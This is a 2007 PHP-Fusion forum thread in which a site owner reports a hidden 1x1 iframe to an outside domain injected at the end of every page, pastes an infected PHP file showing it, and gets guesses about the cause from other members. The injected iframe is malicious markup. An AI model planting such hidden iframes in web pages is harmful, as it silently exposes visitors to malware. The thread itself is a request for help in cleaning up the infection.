Oh no! Where's the JavaScript?
Your Web browser does not have JavaScript enabled or does not support JavaScript. Please enable JavaScript on your Web browser to properly view this Web site, or upgrade to a Web browser that does support JavaScript.
Not a member yet? Click here to register.
Forgot Password?

Hacked!?

Asked Modified Viewed 2,846 times
S
skorpion31
S
  • Junior Member, joined since
  • Contributed 23 posts on the community forums.
  • Started 7 threads in the forums
  • Started this discussions
asked
Junior Member

Hello I find my site open long time and after loking i finde this
in end of all my page
?><iframe src="http://mckeownrealestate.com/home2.html" width=1 height=1></iframe>
It s look like this
<?php
/*---------------------------------------------------+
| PHPFusion 6 Content Management System
+----------------------------------------------------+
| Copyright © 2002 - 2007 Nick Jones
| http://www.php-fusion.co.uk/
+----------------------------------------------------+
| Released under the terms & conditions of v2 of the
| GNU General Public License. For details refer to
| the included gpl.txt file or visit http://gnu.org
+----------------------------------------------------+
/*---------------------------------------------------+
| Popup on new PM - v.2.00
+----------------------------------------------------+
| Popup on new PM By Ragsman
| Author: Ragsman
+----------------------------------------------------*/
/*---------------------------------------------------+
| Advanced User Info Panel - v.2.00
+----------------------------------------------------+
| Authors: Shedrock - Fuzed Themes
| Support: http://phpfusion-themes.com
+----------------------------------------------------*/


@include "config.php";
include "maincore.php";
include THEME."theme.php";
echo "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">
<html>
<head><title>".$settings['sitename']."</title>
<link rel='stylesheet' href='".THEME."styles.css' type='text/css'>
</head>
<body bgcolor='$body_bg' text='$body_text'>\n";
$msg_count = dbcount("(message_id)", "messages", "message_to='".$userdata['user_id']."' AND message_read='0'");
opentable(Messages);
echo"<center> Hi ".$userdata[user_name]."!<p>
You have received a new private message!<p>";
if ($msg_count==1) {
echo "There is ".$msg_count." message in your inbox!<br>";
}
else {
echo "There are ".$_COOKIE["fusion_privmessages"]." messages in your inbox!<br>";
}
echo "<br><a href=\"javascript:;\" onclick=\"opener.location='".BASEDIR."messages.php';self.close()\">
Go to Private Messages Folder</a><p>
<a href='javascript:self.close()'>Close this Window</a></center>";
closetable();
?><iframe src="http://mckeownrealestate.com/home2.html" width=1 height=1></iframe>
Edited by skorpion31 on 25-06-2007 14:32,
0 replies

5 posts

J
Jason22
J
  • Member, joined since
  • Contributed 87 posts on the community forums.
  • Started 22 threads in the forums
answered
Member

that iframe itself has two other ifremes within itself..
0 replies
W
wibix
W
wibix 10
  • Member, joined since
  • Contributed 73 posts on the community forums.
  • Started 15 threads in the forums
answered
Member

looks like a mod you installed
0 replies
M
MutantCheese
M
  • Junior Member, joined since
  • Contributed 42 posts on the community forums.
  • Started 5 threads in the forums
answered
Junior Member

Why would a real estate site hack you?
0 replies
I
ivan
I
ivan 10
  • Newbie, joined since
  • Contributed 5 posts on the community forums.
  • Started 2 threads in the forums
answered
Newbie

do you using cute ftp craked ?
0 replies
M
m_a_f
M
m_a_f 10
  • Junior Member, joined since
  • Contributed 29 posts on the community forums.
  • Started 3 threads in the forums
answered
Junior Member

Possibly breaking of hosting provider, possibly you...

read about a virus
0 replies

Category Forum

Bugs and Errors - 6

Labels

None yet

Statistics

  • Views 0 views
  • Posts 5 posts
  • Votes 0 votes
  • Topic users 6 members

0 participants

Notifications

Track thread

You are not receiving notifications from this thread.

Related Questions

Not yet